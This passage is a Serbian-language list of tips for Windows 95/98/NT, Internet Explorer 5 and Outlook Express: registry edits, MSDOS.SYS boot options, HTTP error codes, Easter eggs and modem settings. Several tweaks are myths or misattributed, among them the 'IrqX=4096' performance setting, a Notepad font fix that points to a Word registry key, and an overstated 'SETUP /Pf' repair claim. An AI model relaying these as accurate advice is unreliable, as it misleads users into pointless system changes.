bi trebao da se odaziva brze. Dok Disk Defragmenter radi svoj posao startovanje Screen Savera nije preporucljivo jer ce posao morati da se radi iz pocetka. Da ne bi ste vrteli misa ukrug za vreme defragmentacije, posegnite za elegantnijem resenju. Sa Regeditom idite do HKEY_CURRENT_USER \ Software \ Microsoft\ Windows \ CurrentVersion \ Applets i napravite novi key "Defrag". Pod njim napravite key "Settings" a unutar njega novi key "DisableScreenSaver" i dodelite mu vrednost "Yes". Sledeci put kada se startuje Defrag, Screen Saver ce biti deaktiviran. Uz pomoc ovog trika svaki put kada se startuje Windows pojavice se prozor sa proizvoljnim tekstom koji ste vi napisali. Ovo je zgodna stvar ukoliko zelite nesto vazno da napomenete korisnicima racunara ili da im skrenete paznju na nesto. Sa Regeditom idite do HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon i napravite stavku LegalNoticeCaption i ubacite tekst koji zelite. Imate instaliran Windows 98 i u poslednje vreme radi nestabilno? Ukoliko zelite da vratite Windows 98 u ispravno stanje t.j. stanje koje ste imali kada ste ga prvi put instalirali, uradite sledece. Butujte PC sa Windows 98 Boot diskom, ubacite Windows 98 CD i otkucajte "D:SETUP /Pf" (bez navodnika) ukoliko je D vas CD- ROM. Sa ovom komandom cete Windows 98 vratiti u "factory state" i u 99% slucajeva popraviti sve probleme u sistemu. Sigurno ste vec sto puta culi o Cookies-ima i o njihovom uticaju na vasu privatnost dok surfujete webom. Standardna je preporuka da ih sa vremena na vreme obrisete, ali time mozete dosta izgubiti na komforu pri surfovanju webom, pogotovo na onim sajtovima koje cesto

posecujete. U IE5 postoji zgodna opcija 'Export Cookies' koja vas moze spasti nevolja. Pre nego sto obrisete Cookie idite na File/ Import Export i izaberite 'Export Cookies' i snimite ga u fajl. Ukoliko nesto ne bude valjalo posle brisanja sa komandom Import mozete sve vratiti u predjasnje stanje. Korisnici Netscape-a mogu lako da pogledaju sta se desava u njihovom gradu veceras ili sta igra u bioskopu. Dovoljno je samo da otkucaju npr. 'zip 90210' i saznace sta se desava na Beverly Hillsu. Ova opcija za sada radi samo da US podrucje. Ukoliko imate NT4 i vise od 64MB RAMa postarajte se da vam je stavka DisablePagingExecutive stavljena na 1. Ovim ce sistem iskorisiti svu raspolozivu memoriju. Putanja do ove stavke je HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \Session Manager \ Memory Management \ DisablePagingExecutive Ukoliko primetite da vam se sistem ponasa cudno t.j. nestablino, potrazite fajl Bootlog.txt u rutu hard diska. Potrazite stavke 'Fail'. Videcete koji drajveri fale i koji nisu mogli biti ucitani. Njih verovatno posedujete na instalacionom CDu Windowsa pa ih tamo i potrazite i prekopirajte negde u Windowsov 'path'. Primeticete da se stvari rade bolje. Ukoliko nemozete da nadjete fajl Bootlog.txt ubacite u MSDOS.SYS stavku "DISABLELOG=0" Ukoliko instalirate Internet Explorer sa Windows Desktop update-om moze se dogoditi na vam nestane NEW komanda iz menija koji dobijate kada desnim dugmetom kliknete da desktop. Ovo je klasican MS bug a popravlja se tako sto cete vresnosti u registry bazi vratiti na sledece: Key: [HKEY_CLASSES_ROOT\Directory\Background\ shellex\ ContextMenuHandlers\New] Value Name: (Default) Data Type: REG_SZ Data: {D969A300-E7FF-11d0-A93B-00A0C90F2719} Koliko puta ste, surfujuci webom, videli neku jako dobru Macromedia Flash animaciju a niste bili u mogucnosti da je snimite jer takva opcija jednostavno ne postoji? Resenje ovog problema je da dok u browseru gledate Flash animaciju, pomocu Find komande, potrazite *.SWF fajlove i prekopirajte ih u neki drugi folder. Najverovatnije taj fajl necete moci otrvoriti duplim klikom na njega nego cete ga uz pomoc drag&amp;dropa prebaciti u IE a on ce vec uraditi svoj deo posla. Da li znate da je moguce promeniti kolicinu memorije koju ce koristiti svaki IRQ port pojednicno? Otvorite System.ini fajl u iu sekciji [386enh] dodajte stavku IrqX=4096 gde je X broj IRQ porta. Snimite i rebutujte. Ovim povecavate rezervisanu memoriju za IRQ port i time uvecavate njegove performanse. U praksi se pokazalo da najvece dobitke ostvaruju mrezne kartice, tako da ukoliko je posedujete obavezno ovo uradite. Uz pomoc ovog trika u meniju koji dobijete kada desnim dugmetom kliknete na bilo koji folder dobicete opciju 'Explore from here' sto ustvari

znaci da ce se kada kliknete na tu opciju otvoriti novi Explorer tog foldera. Idite do KEY_CLASSES_ ROOT\Directory\shell\Explore (ako ne postoji-napravite) i promenite vrednost 'Default' u 'Explore from here'. Napravite novu key pod 'Explore' sa imenom 'command' i editujte Default vrednost u 'explorer.exe /e,/root,/idlist,%i' Ukoliko ste npr. instalirali Windows na posebnu particiju i ne zelite da se na tu particiju bilo sta upisuje sto nije vezano za sitem pa ni fajlovi Outlook Expressa, evo nacina kako da promenite putanju do foldera gde ce OE upisivati e-mailove i news poruke. Sa Regeditom idite do HKEY_CURRENT_ USER\Software\Microsoft\Outlook Express i u stavku 'Store Root' upisite novu putanju do zeljenog foldera. Nervira li vas beep iz PC Speakera? Ukoliko zelite da ga iskljucite sa Regeditom idite do HKEY_CURRENT_USER\ Control Panel\Sound i pronadjite stavku Beep. Ukoliko ne postoji napravite je(New/ String Value). Stavci dodelite vrednost No (ili Yes ukoliko se predomislite) i vas Speaker ce po sledecem startovanju Windowsa biti iskljucen. Da li ste ikada naleteli na neke brojke tipa 404 dok ste surfovali webom? 404 ustvari znaci da sajt nije nadjen, 401 -neovlascen zahtev, 402 -obavestenje da je potrebna uplata, 403 - zabranjen pristup, 408 -timeout zahteva, 500 - greska u serveru(internom), 501 -non-implemented server-side facility, 503- preopterecen server Ukoliko zelite da kontrolisete kako ce se vas Windows butovati editujte fajl MSDOS.SYS koji se nalazi u rutu. Prvo mu iskljucite Read-Only atribut - ukoliko ne znate kako, ovo nije za vas. U sekciji [Options] postoje sledece stavke a vrednost '1' znaci DA a '0' znaci NE. BootGUI=1 (boot into Windows); DblSpace=0 (load DoubleSpace drivers); DrvSpace=0 (load DriveSpace drivers); LoadTop=1 (load command shell in upper memory); BootMenu=1 (turn on boot menupreporucljivo); BootMenuDefault=1 (choice in boot menu); BootMenuDelay=2 (seconds to delay boot menu); BootKeys=1 (keyboard shortcuts for more booting options); Logo=1 (see the Windows splash screen); AutoScan=0 (automatically scandisk after a 'bad' shutdown); BootWarn=0 (warning about going into Safe mode); DisableLog=0 (boot up logging Windows 2000 dolazi sa novim instalerom zvanim 'Microsoft Windows Installer'. Buduce instalacije dolazice u novom formatu .MSI pa ukoliko zelite da otvorite ovakav fajl moracete ovo instalirati. Microsoft je novi instaler preuredio za Windows 95, 98, NT pa ga slobodno mozete preuzeti sa: www.microsoft.com/msdownload/platformsdk/instmsi.htm U Windowsu 98 se desava da se CD ne startuje automatski po ubacivanju u drajv. Ovaj bag se resava tako sto cete u registriju otici do [HKEY_CURRENT_USER\Software\ Microsoft\ Windows\CurrentVersion\Policies\Explorer] i napraviti novu stavku sa imenom NoDriveTypeAutoRun sa vrednoscu 0000 95 00 00 00

Smetaju vam neke ikone u Control Panelu i zeleli bi da ih se otarasite. Nista lakse! Trazite fajlove sa ekstenzijom *.CPL. Ove fajlove mozete skloniti iz System foldera ali budite oprezni - neki su zaista neophodni. Sigurniji nacin je da u Control.ini fajlu u sekciji [don't load] upisete koje fajlove Windows ne treba da ucita. Npr. ukoliko ne zelite da vam se ucita Quick Time aplet za Control Panel onda cete u pomenutoj sekciji upisati "quicktime.cpl=no" (bez navodnika) Koji je najbrzi nacin kreiranja shortcuta? Ne znam, ali ovaj sigurno treba uzeti u obzir. Dok ste u Win Exploreru odvucite ikonu iz gornjeg levog ugla na desktop i dobicete shortcut za folder u kojem ste se nalazili. Ovo isto mozete koristiti i u IE da bi na najlaksi nacin dobili shortcut na desktopu za odredjeni URL. Prilikom kopiranja programa sa CD-a moze se dogoditi da program odbija da radi. Ukoliko ste sigurni da je CD dobro snimljen onda jedini problem moze biti u tome sto su prekopirani fajlovi u READ ONLY modu. Oznacite sve fajlove i u Properties iskljucite Read Only. Imate malo mesta na hard disku i zelite da napravite malo mesta? Ukoliko zelite instant 7 MB vise na vasem hardu idite do foldera C:\Windows\Help i obrisite sve AVI fajlove jer oni predstavljaju tutorial Windowsa a predpostavljam da vam to vise ne treba. Kako da ogranicite pretragu na Altavisti na samo jedan domen? Ukoliko npr. zelite da pretrazite rec MP3 samo u "yu" domenu korisitite sledecu sintaksu "host:.yu mp3". Jedan od glavnih uzroka pada sistema je koriscenje starih 16. bitnih programa. Kako da na najbrzi nacin saznate da li je program 16. ili 32. bitan? Otvorite EXE fajl programa u Quick View-u i informacije o njemu su pred vama. Ako je program 16. bitan pokusajte da pronadjete noviju verziju, update ili cak njegovu 32. bitnu verziju. Jedan od najlaksih provera sistema na viruse trojance je da u DOS Prompt-u otkucate "netstat -a" (bez navodnika). Ova komanda ce vam dati prikaz svih otvorenih portova. Treba je startovati dok racunar nije povezan na internet i proveriti da li postoji neki otvoreni port koji ima status "Listening". Ako je broj porta ispod 1024, velika je verovatnoca da se radi o nekom sistemskom servisu. Medutim, ako je broj iznad 1024 proverite sistem sa nekim anti-virusnim programom. Kolega na poslu predugo drzi rekord u Minesweeperu? Rekord bi veoma lako oborili samo da nema tog prokletog sata, zar ne? Da bi zaustavili sat kliknite bilo gde na tablu da bi pocelo da tece vreme. Pritisnite zajedno levo i desno dugme misa i taster ESCAPE i do kraja radnog vremena rekord ce biti vas! :) Znate li Easter Egg Helpa Windowsa 95? Idite na Start/ Help i izaberite Find. Ukoliko dosad niste napravili index bazu napravite je. Pod Options treba da vam bude ukljuceno "All the words you typed in any order" i "begin with the characters you type" a ostalo nije bitno. Kliknite na OK.

Pod Find otkucajte "Who knows who built this tool?" (bez navodnika sa velikim W) i drzite SHIFT i CTRL pa kliknite na Clear. Opet idite pod Options ali ovaj put stavite "At least one of the words you typed" i "contain the characters you type". Kliknite na OK pa otkucajte "The Shadow knows!" (bez navodnika sa velikim T i S). Drzite SHIFT i CTRL pa opet Clear i Easter Egg je tu! Koristite li BCC kada saljete e-mail na vise korisnika? Koriscenjem BCCa (Blind Carbon Copy) mozete poslati isti email na vise e-mail adresa a da pritom oni koji su dobili taj e-mail ne znaju kome ste jos poslali. Koliko postujete privatnost drugih toliko ce i drugi postovati vasu. Verovatno ste primetili da svaki put kada editujete DOC fajl u Wordu97/2K oni budu veci bez obzira koliko brisali unutar njega. Ova pojava se desava zbog opcije Auto Save, koju treba iskljuciti, a da bi DOC fajlove sveli na razumne duzine otvorite ih pa ih snimite sa Save As. Primeticete da su fajlovi dosta manji. Zelite da editujete sistemske ini fajlove? Uvek je dobro imati ih sve zajedno otvorene zbog bolje preglednosti. Za tu svrhu najbolje ce vam posluziti program Sysedit (windows\system\ sysedit.exe) koji automatski otvara Autoexec.bat, Config.sys, Win.ini, System.ini i Protocol.ini pa tako editovanje postaje znatno lakse. Dok ste citali postu u Outlook Expressu pukao vam je sistem ili mozda nestala struja? Po sledecom startovanju sistema startovace vam se Scan Disk i naci ce gresku u Outlook-ovom history fajlu. Popravite ga. Kada budete startovali OE, poruku koju ste citali necete moci da vidite zbog toga sto OE nije bio propisno ugasen. Ali ovo ne treba da vas plasi jer poruka je jos uvek tu. Dovoljno je samo da klikete na bilo koji drugi email pa posle toga ponovo na problematicni i sada nece biti problema. Desilo vam se da u browseru dobijete potpuno drugu web stranicu od zahtevane? E pa doslo je vreme da pocistite Cache t.j. Temporary Internet fajlove jer je vas omiljni browser pocelo pomalo da brlja. Kako na najbrzi nacin startovati Windows Explorer? Ukoliko imate Windows tastaturu pritisnite Winkey + E i to je to! Ukoliko radite sa Windows Explorerom verovatno ste primetili da ukoliko pokusate da upravo snimljeni fajl na disketu presnimite na hard disk radi provere(posto su diskete prilicno nepouzdane), sistem ga nece uopste citati sa diskete nego ce ga direktno iz buffera presnimiti na hard. Da bi pocistili buffer flopi diska jednostavno izbacite i ubacite diksetu u flopi i tek ce sada fajl sa diskete biti procitan i presnimljen na hard. Nervira li vas onaj ruzni font u Notepadu? Ukoliko zelite da ga promenite moracete da cepkate malo po registry-ju. Idite do: HKEY_CURRENT_USER\Software\Microsoft\Office\ 8.0\ Word\Options i promenite "fixedfon.fon" u novi font. Napomena: TrueType(.TTF) fontovi nisu podrzani

Ako ste jedan od mnogobrojnih koji su potpuno zapostavili svoju numericku tastaturu (da, to su oni tasteri sa strane gde se uhvatila paucina) evo nacina kako da ih najbolje iskorisite u Windowsu. Svaka ikona na desktopu moze imati svoju precicu (shortcut) preko tastature t.j. hot key. Da bi ste konfigurisali "vruce tastere" kliknite desnim dugmetom na desktop ikonu i izaberite Properties/ Shortcut. Na Shortcut Key kliknite jedanput i potom pritisnite taster(sa numericke tastature) koji ce ubuduce biti precica sa startovanje tog programa. Kako startovati IE bez ikakvih ikona, tool i status barova? Start/ RUN/ i otkucajte "iexplore -k http://www.domain.com/" Da bi ste brze resetovali masinu (Start/Shutdown/Restart) drzite SHIFT taster pre nego sto kliknete na OK Ukoliko necete da vam se automatski startuje CD, drzite SHIFT taster pri ubacivanju CD-a. Auto search opcija u Internet Exploreru je sjajna stvar ali samo za domene .com, .edu, ili .org . Dodajte sami jos neke domene, kao sto su .net ili jos bolje .co.yu tako sto cete sa Regeditom otici na HKEY_LOCAL_MACHINE &gt; SOFTWARE &gt; Microsoft &gt; Internet Explorer &gt; Main &gt; UrlTemplate i tamo uneti ono sto vam treba Kada trazite fajlove sa Windows Find (Start/Find) obelezite neki fajl od pronadjenih i preko File menija potrazite opciju 'Open Containing Folder'. Ukoliko upotrebite ovu opciju naci cete se u folderu gde je fajl, koji ste trazili, pronadjen! Ukoliko vam cesto "puca" veza sa vasim provajderom pokusajte da uradite sledece. Idite na Control Panel\ Modems\ Properties\ Connection i na kraju Advanced i pod Extra settings otkucajte "S10=50" (bez navodnika). Ovo bi trebalo da "ojaca" izdrzljivost modema. Ukoliko imate vise unosa pod Extra Settings razdvojte ih razmakom To je vecina trikova koji postoje u windowsima, ali ima njih jos puno koji su ostali ne istrazeni ali i oni ce uskoro biti na ovim stranicama....uskoro ocekujte nastavak ovih trikova naravno dok odmorim malkice prste. P.S. Htio bih da napomenem da ovo nisu sve moji trikovi oni su skidani sa svih strana pomalo... ------------------------------------------------------------------